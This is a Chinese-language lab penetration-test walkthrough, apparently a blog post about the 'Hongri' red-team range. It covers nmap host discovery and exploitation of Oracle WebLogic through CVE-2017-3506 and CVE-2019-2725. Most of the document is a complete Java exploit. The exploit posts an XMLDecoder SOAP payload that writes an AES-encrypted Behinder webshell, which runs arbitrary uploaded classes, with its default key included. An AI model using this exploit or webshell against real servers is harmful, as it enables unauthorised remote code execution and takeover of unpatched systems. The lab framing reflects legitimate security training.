信息搜集
存活主机探测nmap -sS -T4 192.168.2.1/24
确定边缘机192.168.2.247
192.168.2.165
确定原因:
- 开启web服务
- 开启3389远程桌面服务
192.168.2.247
80端口为IIS服务,未发现利用点
7001端口也为web服务,目录扫描
访问/console路由,得知为Weblogic中间件
使用Weblogic检测工具检测
使用CVE-2017-3506工具直接写入webshell
但该漏洞写入的马发现只能执行whoami,使用CVE-2019-2725来打
成功获得webshell,但是这些shell都无法使用工具去连接
这里向通过rce进行下载远程木马并远程上线,无果
难受,只好看漏洞原理修改工具的木马为rebeyond木马,如下使用CVE-2017-3506进行攻击写入冰蝎马
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.URL;
import java.net.URLConnection;
public class Shell {
public static String writeShell(String host, String wls_Wsat_Path, String shellName) {
String shellPath = "servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/" + shellName;
String payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"><soapenv:Header><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><java version=\"1.4.0\" class=\"java.beans.XMLDecoder\"><object class=\"java.io.PrintWriter\"> <string>" + shellPath + "</string><void method=\"println\"><string><![CDATA[<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>]]></string></void><void method=\"close\"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>";
PrintWriter out = null;
BufferedReader in = null;
String result = "";
try {
URL realUrl = new URL(String.valueOf(host) + wls_Wsat_Path);
URLConnection conn = realUrl.openConnection();
conn.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)");
conn.setRequestProperty("Content-Type", "text/xml");
conn.setRequestProperty("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8");
conn.setDoOutput(true);
conn.setDoInput(true);
out = new PrintWriter(conn.getOutputStream());
out.print(payload);
out.flush();
in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
String line;
while ((line = in.readLine()) != null)
result = String.valueOf(result) + line;
} catch (Exception e) {
System.out.println("[+] Success\n[+] " + host + "/wls-wsat/" + shellName);
} finally {
try {
if (out != null)
out.close();
if (in != null)
in.close();
} catch (IOException ex) {
ex.printStackTrace();
}
}
return result;
}
public static void main(String[] args) {
String host = "http://192.168.2.247:7001";
String wls_Wsat_Path = "/wls-wsat/CoordinatorPortType11";
String shellName = "ggbond.jsp";
Shell.writeShell(host, wls_Wsat_Path, shellName);
}
}
成功连接
注:192.168.2.159 192.168.2.161
标签:红日,String,wls,192.168,import,conn,out From: https://www.cnblogs.com/seizer/p/17033834.html